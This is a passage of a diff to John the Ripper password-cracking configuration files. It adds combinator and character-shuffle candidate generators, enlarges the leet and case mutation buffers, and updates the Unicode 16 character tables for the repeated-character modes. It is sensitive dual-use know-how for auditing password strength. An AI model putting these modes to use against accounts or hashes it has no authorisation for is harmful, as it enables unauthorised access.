-# script changed to append a _ character before the number, each time within
-# the next() function. Done this way to better validate that -restore within
-# jtr is working properly.
-#
-[List.External:Hybrid_example]
-/* static vars for the script */
-int cnt, length, total;
+# Several hybrid external modes follow.  These are to be used on top of another
+# cracking mode and they generate multiple candidate passwords from each "word"
+# output by the other mode.
+
+# Combine words coming from another cracking mode into pairs.  This gradually
+# memorizes up to the initial 1 MB worth of words and uses them to prefix and
+# suffix each current word.
+# Known limitations:
+# 1. --restore of interrupted session does not work right (no opportunity to
+# re-memorize the other mode's skipped words), so do not use it.
+# 2. The progress indicator and ETA are too optimistic (they assume linear
+# progress through the input stream, but complexity within 1 MB is quadratic).
+# Example usage: --wordlist --external=combinator --rules-stack=phrase
+[List.External:Combinator]
+int separator;
+int words[1000000], size;
+int base[160], base_size, base_length, swap, p, q;
 
 void init()
 {
-	/* in this simple example, we always generate 100 candidates per word */
-	total = 100;/* this is a VERY simple example */
+	separator = ' '; // Set to 0 for no separators
+
+	size = 1000000; // Must not exceed size of words array
+	base_size = 160; // Must not exceed size of base array, nor (319-1)/2+1
+
+	if (req_maxlen && base_size > req_maxlen + 1)
+		base_size = req_maxlen + 1;
+	q = 0;
 }
 
-/* new word */
 void new()
 {
-	/* get the word length) */
-	length = 0; while (word[length++]) ; --length;
+	swap = p = 0;
 
-	/*
-	 * If this was a more complex script, we would compute total candidates
-	 * at this location, if we can. If we can not compute total candidates
-	 * then it is likely we can not resume 'easily', so if that is the
-	 * case, we would simply set hybrid_total to -1, or do nothing, since
-	 * do_external_hybrid_crack() sets it to -1 before calling this function.
-	 */
-	 hybrid_total = total;
+/* Memorize this base word if it fits and is of right length */
+	base_length = -1;
+	while (q < size && (words[q++] = word[++base_length]))
+		continue;
+	if (q < size && base_length < base_size && base_length)
+		return;
 
-	/* Reset or counter for THIS word. */
-	cnt = 0;
-
-	/*
-	 * word will be too long to be used, or too short to be used. If so
-	 * then set hybrid_total to 0 and this entire word will be skipped.
-	 */
-	if (req_minlen > length - 2 || (req_maxlen && req_maxlen < length + 2))
-		hybrid_total = 0;
+/* Don't memorize this base word, but finish computing its length */
+	q -= base_length + 1;
+	if (word[base_length])
+		while (word[++base_length])
+			continue;
+	else if (!base_length)
+		base_length = base_size; // Skip empty words
 }
 
 void next()
 {
-	/* in this simple script, if cnt is 100, this word is DONE */
-	if (cnt == 100) {
-		word[0] = 0;
+	int i, j;
+
+	if (base_length >= base_size) {
+		word = 0;
 		return;
 	}
 
-	/* set word[] to the next candidate */
-	word[length++] = '_';
-	word[length  ] = '0' + cnt / 10;
-	word[length+1] = '0' + cnt % 10;
-	word[length+2] = 0;
-	++cnt;
+	if (swap) {
+/* Next memorized word first, separator and current base word next */
+		i = -1;
+		while (word[++i] = words[p++])
+			continue;
+		if (p >= q) {
+			word = 0;
+			return;
+		}
+		if (separator)
+			word[i++] = separator;
+		j = 0;
+		while (word[i++] = base[j++])
+			continue;
+		return;
+	}
+
+/* Current base word first, separator and next memorized word next */
+	i = base_length;
+	if (separator)
+		word[i++] = separator;
+	while (word[i++] = words[p++])
+		continue;
+	if (p >= q) {
+		p = 0;
+		swap++;
+		i = -1;
+		while (++i < base_length)
+			base[i] = word[i];
+		base[i] = 0;
+	}
 }
 
-/* Called when restoring an interrupted session */
-void restore()
+# Shuffle (try all permutations of) characters in each short input word
+[List.External:Shuffle]
+int max_length, ctz_bits, ctz_mask, ctz[0x80000]; // Max 0xa00000 for length 20
+int length, base[0x20], id[0x20], unseen[0x20], is_dup[0x100], c2mask[0x100];
+
+void init()
 {
-	int i;
+	max_length = 10; // ctz array size of 0x80000 is good up to length 16
 
-	length = 0; while (word[length++]) ; --length;
-
-	/* for this simple script, simply setting cnt resumes */
-	cnt = hybrid_resume + 1; if (cnt > 100) cnt=100;
+	/* Prepare a count trailing zero table */
+	int i, j, mask;
+	ctz_mask = (1 << (ctz_bits = max_length - 1)) - 1;
 	i = 0;
-	while (i++ < cnt) word[length++] = '_';
-	word[length] = 0;
+	while (i++ < ctz_bits) {
+		j = 0;
+		while (j <= ctz_mask)
+			j += 1 << (ctz[j] = i);
+	}
+	/* followed by its revisions for skipping some bits */
+	while ((i = j >> ctz_bits) < max_length) {
+		mask = j & ctz_mask;
+		while (i--)
+			mask &= mask - 1;
+		ctz[j++] = ctz[mask];
+	}
+}
 
-	/* tell john that we have properly 'resumed', by setting a 'proper' total */
-	hybrid_total = total;
+void new()
+{
+	int c, i;
+
+	length = i = -1;
+	while (c = word[++length]) {
+		if (length > max_length)
+			return;
+		c2mask[base[length] = c] = id[length] = 0;
+	}
+	while (c = word[++i]) {
+		is_dup[c] = c2mask[c];
+		c2mask[c] |= 1 << i;
+	}
+
+	unseen = 0;
+}
+
+void next()
+{
+	int prev_unseen, i, j;
+
+	if ((i = length - 1) < max_length)
+	while (i--) {
+		if (++id[i] >= length - i) {
+			id[i] = 0;
+			continue;
+		}
+
+		if (unseen)
+			prev_unseen = unseen[i];
+		else
+			unseen[i = 0] = prev_unseen = ctz_mask;
+		while (i < length) {
+			/* Skip id[i] previously unseen char indices */
+			/* Take that char and see if it's unique */
+			if (is_dup[word[i] = base[j = ctz[prev_unseen | (id[i] << ctz_bits)]]])
+				if (c2mask[word[i]] & prev_unseen & ((1 << j) - 1))
+					break; /* Dupe in wrong order */
+			unseen[++i] = prev_unseen &= ~(1 << j);
+		}
+
+		if (i >= length) /* Not a dupe */
+			return;
+
+		/* Next loop ++id[i] will skip the dupe char in i's position */
+		i++;
+	}
+
+	word = 0;
+}
+
+# Simplified or reference version of the above, same output much slower
+[List.External:Shuffle-simple]
+int max_length, length, base[320], id[320], jd[320];
+
+void init()
+{
+	max_length = 10; // Our usage of bitmasks is good up to length 32
+}
+
+void new()
+{
+	length = 0;
+	while (base[length] = word[length])
+		id[length++] = 0;
+}
+
+void next()
+{
+	int unseen, i, j, k;
+
+	if ((i = length) <= max_length)
+	while (i--) {
+		if (++id[i] >= length - i) {
+			id[i] = 0;
+			continue;
+		}
+
+		i = unseen = -1;
+		while (++i < length) {
+			/* Skip id[i] previously unseen char indices, count */
+			j = -1;
+			k = id[i];
+			while (k >= 0)
+				if (unseen & (1 << ++j))
+					k--;
+			/* Take that char */
+			word[k = i] = base[jd[i] = j];
+			/* Same chars must only appear in one order */
+			while (k--)
+				if (word[k] == word[i])
+					break;
+			if (k >= 0)
+				if (jd[k] >= j) /* Wrong order */
+					break;
+			unseen &= ~(1 << j);
+		}
+
+		if (i >= length) /* Not a dupe */
+			return;
+
+		/* Next loop ++id[i] will skip the dupe char in i's position */
+		i++;
+	}
+
+	word = 0;
 }
 
 # External hybrid 'leet code
@@ -3896,11 +4152,11 @@ void restore()
  *   t -> t7
  */
 
-int rotor[626]; /* max length input is 125 bytes [125*5+1]; */
-int rotors[125];
-int rotor_ptr[125];
-int rotor_idx[125];
-int rotor_cnt[125];
+int rotor[1596]; /* max length input is 319 bytes [319*5+1] */
+int rotors[319];
+int rotor_ptr[319];
+int rotor_idx[319];
+int rotor_cnt[319];
 int current_word_count;
 int max_mangle; /* controls how many bytes we run through our 'leet' code */
 int max_mangle_letters;
@@ -4011,11 +4267,11 @@ void next()
 # Shared base code for External hybrid CaSE and Wordcase mutation code
 [List.External_base:Case]
 
-int rotor[251]; /* max length input is 125 bytes [125*5+1]; */
-int rotors[125];
-int rotor_ptr[125];
-int rotor_idx[125];
-int rotor_cnt[125];
+int rotor[639]; /* max length input is 319 bytes [319*2+1] */
+int rotors[319];
+int rotor_ptr[319];
+int rotor_idx[319];
+int rotor_cnt[319];
 int current_word_count;
 int max_mangle; /* controls how many bytes we run through our 'leet' code */
 int original_word; /* if set to 1 then we start with original word. If 0, then start with first mangled word */

data/jtr/repeats16.conf

@@ -1,11 +1,11 @@
-# This software is Copyright (c) 2012-2020 magnum, and it is hereby
+# This software is Copyright (c) 2012-2024 magnum, and it is hereby
 # released to the general public under the following terms:
 # Redistribution and use in source and binary forms, with or without
 # modification, are permitted.
 #
-# Try strings of repeated characters, Unicode (version 13) BMP version
+# Try strings of repeated characters, Unicode (version 16) BMP version
 #
-# Number of candidates = 55,387 x max-length
+# Number of candidates = 55,537 x max-length
 #
 # Note that these modes will handle --max-len differently than normal: They
 # will consider number of characters as opposed to number of bytes. This
@@ -18,7 +18,7 @@
 
 [List.External:Repeats16]
 int minlength, maxlength, maxc, length, c;
-int charset[0x10000];
+int charset[0xd900];
 
 void init()
 {
@@ -39,7 +39,7 @@ void init()
 
 /*
  * This defines the character set. This is auto-generated from UnicodeData.txt
- * and we skip control characters.
+ * of Unicode 16.0.0 and we skip control characters.
  */
 	i = 0;
 // 0000..007F; Basic Latin
@@ -115,9 +115,6 @@ void init()
 		charset[i++] = c++;
 // 0600..06FF; Arabic
 	c = 0x600;		// from ARABIC NUMBER SIGN
-	while (c <= 0x61c)	// ..to ARABIC LETTER MARK
-		charset[i++] = c++;
-	c = 0x61e;		// from ARABIC TRIPLE DOT PUNCTUATION MARK
 	while (c <= 0x6ff)	// ..to ARABIC LETTER HEH WITH INVERTED V
 		charset[i++] = c++;
 // 0700..074F; Syriac
@@ -159,14 +156,17 @@ void init()
 	c = 0x860;		// from SYRIAC LETTER MALAYALAM NGA
 	while (c <= 0x86a)	// ..to SYRIAC LETTER MALAYALAM SSA
 		charset[i++] = c++;
+// 0870..089F; Arabic Extended-B
+	c = 0x870;		// from ARABIC LETTER ALEF WITH ATTACHED FATHA
+	while (c <= 0x88e)	// ..to ARABIC VERTICAL TAIL
+		charset[i++] = c++;
+	charset[i++] = 0x890;	// ARABIC POUND MARK ABOVE
+	charset[i++] = 0x891;	// ARABIC PIASTRE MARK ABOVE
+	c = 0x897;		// from ARABIC PEPET
+	while (c <= 0x89f)	// ..to ARABIC HALF MADDA OVER MADDA
+		charset[i++] = c++;
 // 08A0..08FF; Arabic Extended-A
 	c = 0x8a0;		// from ARABIC LETTER BEH WITH SMALL V BELOW
-	while (c <= 0x8b4)	// ..to ARABIC LETTER KAF WITH DOT BELOW
-		charset[i++] = c++;
-	c = 0x8b6;		// from ARABIC LETTER BEH WITH SMALL MEEM ABOVE
-	while (c <= 0x8c7)	// ..to ARABIC LETTER LAM WITH SMALL ARABIC LETTER TAH ABOVE
-		charset[i++] = c++;
-	c = 0x8d3;		// from ARABIC SMALL LOW WAW
 	while (c <= 0x8ff)	// ..to ARABIC MARK SIDEWAYS NOON GHUNNA
 		charset[i++] = c++;
 // 0900..097F; Devanagari
@@ -356,7 +356,7 @@ void init()
 	c = 0xc2a;		// from TELUGU LETTER PA
 	while (c <= 0xc39)	// ..to TELUGU LETTER HA
 		charset[i++] = c++;
-	c = 0xc3d;		// from TELUGU SIGN AVAGRAHA
+	c = 0xc3c;		// from TELUGU SIGN NUKTA
 	while (c <= 0xc44)	// ..to TELUGU VOWEL SIGN VOCALIC RR
 		charset[i++] = c++;
 	charset[i++] = 0xc46;	// TELUGU VOWEL SIGN E
@@ -402,6 +402,8 @@ void init()
 		charset[i++] = c++;
 	charset[i++] = 0xcd5;	// KANNADA LENGTH MARK
 	charset[i++] = 0xcd6;	// KANNADA AI LENGTH MARK
+	charset[i++] = 0xcdd;	// KANNADA LETTER NAKAARA POLLU
+	charset[i++] = 0xcde;	// KANNADA LETTER FA
 	c = 0xce0;		// from KANNADA LETTER VOCALIC RR
 	while (c <= 0xce3)	// ..to KANNADA VOWEL SIGN VOCALIC LL
 		charset[i++] = c++;
@@ -409,7 +411,7 @@ void init()
 	while (c <= 0xcef)	// ..to KANNADA DIGIT NINE
 		charset[i++] = c++;
 	charset[i++] = 0xcf1;	// KANNADA SIGN JIHVAMULIYA
-	charset[i++] = 0xcf2;	// KANNADA SIGN UPADHMANIYA
+	charset[i++] = 0xcf3;	// KANNADA SIGN COMBINING ANUSVARA ABOVE RIGHT
 // 0D00..0D7F; Malayalam
 	c = 0xd00;		// from MALAYALAM SIGN COMBINING ANUSVARA ABOVE
 	while (c <= 0xd0c)	// ..to MALAYALAM LETTER VOCALIC L
@@ -479,7 +481,7 @@ void init()
 	while (c <= 0xec4)	// ..to LAO VOWEL SIGN AI
 		charset[i++] = c++;
 	c = 0xec8;		// from LAO TONE MAI EK
-	while (c <= 0xecd)	// ..to LAO NIGGAHITA
+	while (c <= 0xece)	// ..to LAO YAMAKKAN
 		charset[i++] = c++;
 	c = 0xed0;		// from LAO DIGIT ZERO
 	while (c <= 0xed9)	// ..to LAO DIGIT NINE
@@ -592,11 +594,9 @@ void init()
 		charset[i++] = c++;
 // 1700..171F; Tagalog
 	c = 0x1700;		// from TAGALOG LETTER A
-	while (c <= 0x170c)	// ..to TAGALOG LETTER YA
-		charset[i++] = c++;
-	c = 0x170e;		// from TAGALOG LETTER LA
-	while (c <= 0x1714)	// ..to TAGALOG SIGN VIRAMA
+	while (c <= 0x1715)	// ..to TAGALOG SIGN PAMUDPOD
 		charset[i++] = c++;
+	charset[i++] = 0x171f;	// TAGALOG LETTER ARCHAIC RA
 // 1720..173F; Hanunoo
 	c = 0x1720;		// from HANUNOO LETTER A
 	while (c <= 0x1736)	// ..to PHILIPPINE DOUBLE PUNCTUATION
@@ -625,9 +625,6 @@ void init()
 		charset[i++] = c++;
 // 1800..18AF; Mongolian
 	c = 0x1800;		// from MONGOLIAN BIRGA
-	while (c <= 0x180e)	// ..to MONGOLIAN VOWEL SEPARATOR
-		charset[i++] = c++;
-	c = 0x1810;		// from MONGOLIAN DIGIT ZERO
 	while (c <= 0x1819)	// ..to MONGOLIAN DIGIT NINE
 		charset[i++] = c++;
 	c = 0x1820;		// from MONGOLIAN LETTER A
@@ -700,14 +697,14 @@ void init()
 		charset[i++] = c++;
 // 1AB0..1AFF; Combining Diacritical Marks Extended
 	c = 0x1ab0;		// from COMBINING DOUBLED CIRCUMFLEX ACCENT
-	while (c <= 0x1ac0)	// ..to COMBINING LATIN SMALL LETTER TURNED W BELOW
+	while (c <= 0x1ace)	// ..to COMBINING LATIN SMALL LETTER INSULAR T
 		charset[i++] = c++;
 // 1B00..1B7F; Balinese
 	c = 0x1b00;		// from BALINESE SIGN ULU RICEM
-	while (c <= 0x1b4b)	// ..to BALINESE LETTER ASYURA SASAK
+	while (c <= 0x1b4c)	// ..to BALINESE LETTER ARCHAIC JNYA
 		charset[i++] = c++;
-	c = 0x1b50;		// from BALINESE DIGIT ZERO
-	while (c <= 0x1b7c)	// ..to BALINESE MUSICAL SYMBOL LEFT-HAND OPEN PING
+	c = 0x1b4e;		// from BALINESE INVERTED CARIK SIKI
+	while (c <= 0x1b7f)	// ..to BALINESE PANTI BAWAK
 		charset[i++] = c++;
 // 1B80..1BBF; Sundanese
 	c = 0x1b80;		// from SUNDANESE SIGN PANYECEK
@@ -735,7 +732,7 @@ void init()
 		charset[i++] = c++;
 // 1C80..1C8F; Cyrillic Extended-C
 	c = 0x1c80;		// from CYRILLIC SMALL LETTER ROUNDED VE
-	while (c <= 0x1c88)	// ..to CYRILLIC SMALL LETTER UNBLENDED UK
+	while (c <= 0x1c8a)	// ..to CYRILLIC SMALL LETTER TJE
 		charset[i++] = c++;
 // 1C90..1CBF; Georgian Extended
 	c = 0x1c90;		// from GEORGIAN MTAVRULI CAPITAL LETTER AN
@@ -761,9 +758,6 @@ void init()
 		charset[i++] = c++;
 // 1DC0..1DFF; Combining Diacritical Marks Supplement
 	c = 0x1dc0;		// from COMBINING DOTTED GRAVE ACCENT
-	while (c <= 0x1df9)	// ..to COMBINING WIDE INVERTED BRIDGE BELOW
-		charset[i++] = c++;
-	c = 0x1dfb;		// from COMBINING DELETION MARK
 	while (c <= 0x1dff)	// ..to COMBINING RIGHT ARROWHEAD AND DOWN ARROWHEAD BELOW
 		charset[i++] = c++;
 // 1E00..1EFF; Latin Extended Additional
@@ -827,7 +821,7 @@ void init()
 		charset[i++] = c++;
 // 20A0..20CF; Currency Symbols
 	c = 0x20a0;		// from EURO-CURRENCY SIGN
-	while (c <= 0x20bf)	// ..to BITCOIN SIGN
+	while (c <= 0x20c0)	// ..to SOM SIGN
 		charset[i++] = c++;
 // 20D0..20FF; Combining Diacritical Marks for Symbols
 	c = 0x20d0;		// from COMBINING LEFT HARPOON ABOVE
@@ -855,7 +849,7 @@ void init()
 		charset[i++] = c++;
 // 2400..243F; Control Pictures
 	c = 0x2400;		// from SYMBOL FOR NULL
-	while (c <= 0x2426)	// ..to SYMBOL FOR SUBSTITUTE FORM TWO
+	while (c <= 0x2429)	// ..to SYMBOL FOR DELETE MEDIUM SHADE FORM
 		charset[i++] = c++;
 // 2440..245F; Optical Character Recognition
 	c = 0x2440;		// from OCR HOOK
@@ -921,10 +915,7 @@ void init()
 		charset[i++] = c++;
 // 2C00..2C5F; Glagolitic
 	c = 0x2c00;		// from GLAGOLITIC CAPITAL LETTER AZU
-	while (c <= 0x2c2e)	// ..to GLAGOLITIC CAPITAL LETTER LATINATE MYSLITE
-		charset[i++] = c++;
-	c = 0x2c30;		// from GLAGOLITIC SMALL LETTER AZU
-	while (c <= 0x2c5e)	// ..to GLAGOLITIC SMALL LETTER LATINATE MYSLITE
+	while (c <= 0x2c5f)	// ..to GLAGOLITIC SMALL LETTER CAUDATE CHRIVI
 		charset[i++] = c++;
 // 2C60..2C7F; Latin Extended-C
 	c = 0x2c60;		// from LATIN CAPITAL LETTER L WITH DOUBLE BAR
@@ -985,7 +976,7 @@ void init()
 		charset[i++] = c++;
 // 2E00..2E7F; Supplemental Punctuation
 	c = 0x2e00;		// from RIGHT ANGLE SUBSTITUTION MARKER
-	while (c <= 0x2e52)	// ..to TIRONIAN SIGN CAPITAL ET
+	while (c <= 0x2e5d)	// ..to OBLIQUE HYPHEN
 		charset[i++] = c++;
 // 2E80..2EFF; CJK Radicals Supplement
 	c = 0x2e80;		// from CJK RADICAL REPEAT
@@ -1000,7 +991,7 @@ void init()
 		charset[i++] = c++;
 // 2FF0..2FFF; Ideographic Description Characters
 	c = 0x2ff0;		// from IDEOGRAPHIC DESCRIPTION CHARACTER LEFT TO RIGHT
-	while (c <= 0x2ffb)	// ..to IDEOGRAPHIC DESCRIPTION CHARACTER OVERLAID
+	while (c <= 0x2fff)	// ..to IDEOGRAPHIC DESCRIPTION CHARACTER ROTATION
 		charset[i++] = c++;
 // 3000..303F; CJK Symbols and Punctuation
 	c = 0x3000;		// from IDEOGRAPHIC SPACE
@@ -1035,8 +1026,9 @@ void init()
 		charset[i++] = c++;
 // 31C0..31EF; CJK Strokes
 	c = 0x31c0;		// from CJK STROKE T
-	while (c <= 0x31e3)	// ..to CJK STROKE Q
+	while (c <= 0x31e5)	// ..to CJK STROKE SZP
 		charset[i++] = c++;
+	charset[i++] = 0x31ef;	// IDEOGRAPHIC DESCRIPTION CHARACTER SUBTRACTION
 // 31F0..31FF; Katakana Phonetic Extensions
 	c = 0x31f0;		// from KATAKANA LETTER SMALL KU
 	while (c <= 0x31ff)	// ..to KATAKANA LETTER SMALL RO
@@ -1062,7 +1054,7 @@ void init()
 		charset[i++] = c++;
 // 4E00..9FFF; CJK Unified Ideographs
 	c = 0x4e00;		// from <CJK Ideograph, First>
-	while (c <= 0x9ffc)	// ..to <CJK Ideograph, Last>
+	while (c <= 0x9fff)	// ..to <CJK Ideograph, Last>
 		charset[i++] = c++;
 // A000..A48F; Yi Syllables
 	c = 0xa000;		// from YI SYLLABLE IT
@@ -1094,12 +1086,14 @@ void init()
 		charset[i++] = c++;
 // A720..A7FF; Latin Extended-D
 	c = 0xa720;		// from MODIFIER LETTER STRESS AND HIGH TONE
-	while (c <= 0xa7bf)	// ..to LATIN SMALL LETTER GLOTTAL U
+	while (c <= 0xa7cd)	// ..to LATIN SMALL LETTER S WITH DIAGONAL STROKE
 		charset[i++] = c++;
-	c = 0xa7c2;		// from LATIN CAPITAL LETTER ANGLICANA W
-	while (c <= 0xa7ca)	// ..to LATIN SMALL LETTER S WITH SHORT STROKE OVERLAY
+	charset[i++] = 0xa7d0;	// LATIN CAPITAL LETTER CLOSED INSULAR G
+	charset[i++] = 0xa7d1;	// LATIN SMALL LETTER CLOSED INSULAR G
+	c = 0xa7d5;		// from LATIN SMALL LETTER DOUBLE WYNN
+	while (c <= 0xa7dc)	// ..to LATIN CAPITAL LETTER LAMBDA WITH STROKE
 		charset[i++] = c++;
-	c = 0xa7f5;		// from LATIN CAPITAL LETTER REVERSED HALF H
+	c = 0xa7f2;		// from MODIFIER LETTER CAPITAL C
 	while (c <= 0xa7ff)	// ..to LATIN EPIGRAPHIC LETTER ARCHAIC M
 		charset[i++] = c++;
 // A800..A82F; Syloti Nagri
@@ -1254,19 +1248,16 @@ void init()
 		charset[i++] = c++;
 // FB50..FDFF; Arabic Presentation Forms-A
 	c = 0xfb50;		// from ARABIC LETTER ALEF WASLA ISOLATED FORM
-	while (c <= 0xfbc1)	// ..to ARABIC SYMBOL SMALL TAH BELOW
+	while (c <= 0xfbc2)	// ..to ARABIC SYMBOL WASLA ABOVE
 		charset[i++] = c++;
 	c = 0xfbd3;		// from ARABIC LETTER NG ISOLATED FORM
-	while (c <= 0xfd3f)	// ..to ORNATE RIGHT PARENTHESIS
-		charset[i++] = c++;
-	c = 0xfd50;		// from ARABIC LIGATURE TEH WITH JEEM WITH MEEM INITIAL FORM
 	while (c <= 0xfd8f)	// ..to ARABIC LIGATURE MEEM WITH KHAH WITH MEEM INITIAL FORM
 		charset[i++] = c++;
 	c = 0xfd92;		// from ARABIC LIGATURE MEEM WITH JEEM WITH KHAH INITIAL FORM
 	while (c <= 0xfdc7)	// ..to ARABIC LIGATURE NOON WITH JEEM WITH YEH FINAL FORM
 		charset[i++] = c++;
 	c = 0xfdf0;		// from ARABIC LIGATURE SALLA USED AS KORANIC STOP SIGN ISOLATED FORM
-	while (c <= 0xfdfd)	// ..to ARABIC LIGATURE BISMILLAH AR-RAHMAN AR-RAHEEM
+	while (c <= 0xfdff)	// ..to ARABIC LIGATURE AZZA WA JALL
 		charset[i++] = c++;
 // FE00..FE0F; Variation Selectors
 	c = 0xfe00;		// from VARIATION SELECTOR-1

data/jtr/repeats32.conf

@@ -1,11 +1,11 @@
-# This software is Copyright (c) 2012-2020 magnum, and it is hereby
+# This software is Copyright (c) 2012-2024 magnum, and it is hereby
 # released to the general public under the following terms:
 # Redistribution and use in source and binary forms, with or without
 # modification, are permitted.
 #
-# Try strings of repeated characters, Full Unicode (version 13) version
+# Try strings of repeated characters, Full Unicode (version 16) version
 #
-# Number of candidates = 143,532 x length
+# Number of candidates = 154,663 x length
 #
 # Note that these modes will handle --max-len differently than normal: They
 # will consider number of characters as opposed to number of bytes. This
@@ -23,7 +23,7 @@
 
 [List.External:Repeats32]
 int minlength, maxlength, maxc, length, c;
-int charset[0x24000];
+int charset[0x25c30];
 
 void init()
 {
@@ -44,7 +44,7 @@ void init()
 
 /*
  * This defines the character set. This is auto-generated from UnicodeData.txt
- * and we skip control characters.
+ * of Unicode 16.0.0 and we skip control characters.
  */
 	i = 0;
 // 0000..007F; Basic Latin
@@ -120,9 +120,6 @@ void init()
 		charset[i++] = c++;
 // 0600..06FF; Arabic
 	c = 0x600;		// from ARABIC NUMBER SIGN
-	while (c <= 0x61c)	// ..to ARABIC LETTER MARK
-		charset[i++] = c++;
-	c = 0x61e;		// from ARABIC TRIPLE DOT PUNCTUATION MARK
 	while (c <= 0x6ff)	// ..to ARABIC LETTER HEH WITH INVERTED V
 		charset[i++] = c++;
 // 0700..074F; Syriac
@@ -164,14 +161,17 @@ void init()
 	c = 0x860;		// from SYRIAC LETTER MALAYALAM NGA
 	while (c <= 0x86a)	// ..to SYRIAC LETTER MALAYALAM SSA
 		charset[i++] = c++;
+// 0870..089F; Arabic Extended-B
+	c = 0x870;		// from ARABIC LETTER ALEF WITH ATTACHED FATHA
+	while (c <= 0x88e)	// ..to ARABIC VERTICAL TAIL
+		charset[i++] = c++;
+	charset[i++] = 0x890;	// ARABIC POUND MARK ABOVE
+	charset[i++] = 0x891;	// ARABIC PIASTRE MARK ABOVE
+	c = 0x897;		// from ARABIC PEPET
+	while (c <= 0x89f)	// ..to ARABIC HALF MADDA OVER MADDA
+		charset[i++] = c++;
 // 08A0..08FF; Arabic Extended-A
 	c = 0x8a0;		// from ARABIC LETTER BEH WITH SMALL V BELOW
-	while (c <= 0x8b4)	// ..to ARABIC LETTER KAF WITH DOT BELOW
-		charset[i++] = c++;
-	c = 0x8b6;		// from ARABIC LETTER BEH WITH SMALL MEEM ABOVE
-	while (c <= 0x8c7)	// ..to ARABIC LETTER LAM WITH SMALL ARABIC LETTER TAH ABOVE
-		charset[i++] = c++;
-	c = 0x8d3;		// from ARABIC SMALL LOW WAW
 	while (c <= 0x8ff)	// ..to ARABIC MARK SIDEWAYS NOON GHUNNA
 		charset[i++] = c++;
 // 0900..097F; Devanagari
@@ -361,7 +361,7 @@ void init()
 	c = 0xc2a;		// from TELUGU LETTER PA
 	while (c <= 0xc39)	// ..to TELUGU LETTER HA
 		charset[i++] = c++;
-	c = 0xc3d;		// from TELUGU SIGN AVAGRAHA
+	c = 0xc3c;		// from TELUGU SIGN NUKTA
 	while (c <= 0xc44)	// ..to TELUGU VOWEL SIGN VOCALIC RR
 		charset[i++] = c++;
 	charset[i++] = 0xc46;	// TELUGU VOWEL SIGN E
@@ -407,6 +407,8 @@ void init()
 		charset[i++] = c++;
 	charset[i++] = 0xcd5;	// KANNADA LENGTH MARK
 	charset[i++] = 0xcd6;	// KANNADA AI LENGTH MARK
+	charset[i++] = 0xcdd;	// KANNADA LETTER NAKAARA POLLU
+	charset[i++] = 0xcde;	// KANNADA LETTER FA
 	c = 0xce0;		// from KANNADA LETTER VOCALIC RR
 	while (c <= 0xce3)	// ..to KANNADA VOWEL SIGN VOCALIC LL
 		charset[i++] = c++;
@@ -414,7 +416,7 @@ void init()
 	while (c <= 0xcef)	// ..to KANNADA DIGIT NINE
 		charset[i++] = c++;
 	charset[i++] = 0xcf1;	// KANNADA SIGN JIHVAMULIYA
-	charset[i++] = 0xcf2;	// KANNADA SIGN UPADHMANIYA
+	charset[i++] = 0xcf3;	// KANNADA SIGN COMBINING ANUSVARA ABOVE RIGHT
 // 0D00..0D7F; Malayalam
 	c = 0xd00;		// from MALAYALAM SIGN COMBINING ANUSVARA ABOVE
 	while (c <= 0xd0c)	// ..to MALAYALAM LETTER VOCALIC L
@@ -484,7 +486,7 @@ void init()
 	while (c <= 0xec4)	// ..to LAO VOWEL SIGN AI
 		charset[i++] = c++;
 	c = 0xec8;		// from LAO TONE MAI EK
-	while (c <= 0xecd)	// ..to LAO NIGGAHITA
+	while (c <= 0xece)	// ..to LAO YAMAKKAN
 		charset[i++] = c++;
 	c = 0xed0;		// from LAO DIGIT ZERO
 	while (c <= 0xed9)	// ..to LAO DIGIT NINE
@@ -597,11 +599,9 @@ void init()
 		charset[i++] = c++;
 // 1700..171F; Tagalog
 	c = 0x1700;		// from TAGALOG LETTER A
-	while (c <= 0x170c)	// ..to TAGALOG LETTER YA
-		charset[i++] = c++;
-	c = 0x170e;		// from TAGALOG LETTER LA
-	while (c <= 0x1714)	// ..to TAGALOG SIGN VIRAMA
+	while (c <= 0x1715)	// ..to TAGALOG SIGN PAMUDPOD
 		charset[i++] = c++;
+	charset[i++] = 0x171f;	// TAGALOG LETTER ARCHAIC RA
 // 1720..173F; Hanunoo
 	c = 0x1720;		// from HANUNOO LETTER A
 	while (c <= 0x1736)	// ..to PHILIPPINE DOUBLE PUNCTUATION
@@ -630,9 +630,6 @@ void init()
 		charset[i++] = c++;
 // 1800..18AF; Mongolian
 	c = 0x1800;		// from MONGOLIAN BIRGA
-	while (c <= 0x180e)	// ..to MONGOLIAN VOWEL SEPARATOR
-		charset[i++] = c++;
-	c = 0x1810;		// from MONGOLIAN DIGIT ZERO
 	while (c <= 0x1819)	// ..to MONGOLIAN DIGIT NINE
 		charset[i++] = c++;
 	c = 0x1820;		// from MONGOLIAN LETTER A
@@ -705,14 +702,14 @@ void init()
 		charset[i++] = c++;
 // 1AB0..1AFF; Combining Diacritical Marks Extended
 	c = 0x1ab0;		// from COMBINING DOUBLED CIRCUMFLEX ACCENT
-	while (c <= 0x1ac0)	// ..to COMBINING LATIN SMALL LETTER TURNED W BELOW
+	while (c <= 0x1ace)	// ..to COMBINING LATIN SMALL LETTER INSULAR T
 		charset[i++] = c++;
 // 1B00..1B7F; Balinese
 	c = 0x1b00;		// from BALINESE SIGN ULU RICEM
-	while (c <= 0x1b4b)	// ..to BALINESE LETTER ASYURA SASAK
+	while (c <= 0x1b4c)	// ..to BALINESE LETTER ARCHAIC JNYA
 		charset[i++] = c++;
-	c = 0x1b50;		// from BALINESE DIGIT ZERO
-	while (c <= 0x1b7c)	// ..to BALINESE MUSICAL SYMBOL LEFT-HAND OPEN PING
+	c = 0x1b4e;		// from BALINESE INVERTED CARIK SIKI
+	while (c <= 0x1b7f)	// ..to BALINESE PANTI BAWAK
 		charset[i++] = c++;
 // 1B80..1BBF; Sundanese
 	c = 0x1b80;		// from SUNDANESE SIGN PANYECEK
@@ -740,7 +737,7 @@ void init()
 		charset[i++] = c++;
 // 1C80..1C8F; Cyrillic Extended-C
 	c = 0x1c80;		// from CYRILLIC SMALL LETTER ROUNDED VE
-	while (c <= 0x1c88)	// ..to CYRILLIC SMALL LETTER UNBLENDED UK
+	while (c <= 0x1c8a)	// ..to CYRILLIC SMALL LETTER TJE
 		charset[i++] = c++;
 // 1C90..1CBF; Georgian Extended
 	c = 0x1c90;		// from GEORGIAN MTAVRULI CAPITAL LETTER AN
@@ -766,9 +763,6 @@ void init()
 		charset[i++] = c++;
 // 1DC0..1DFF; Combining Diacritical Marks Supplement
 	c = 0x1dc0;		// from COMBINING DOTTED GRAVE ACCENT
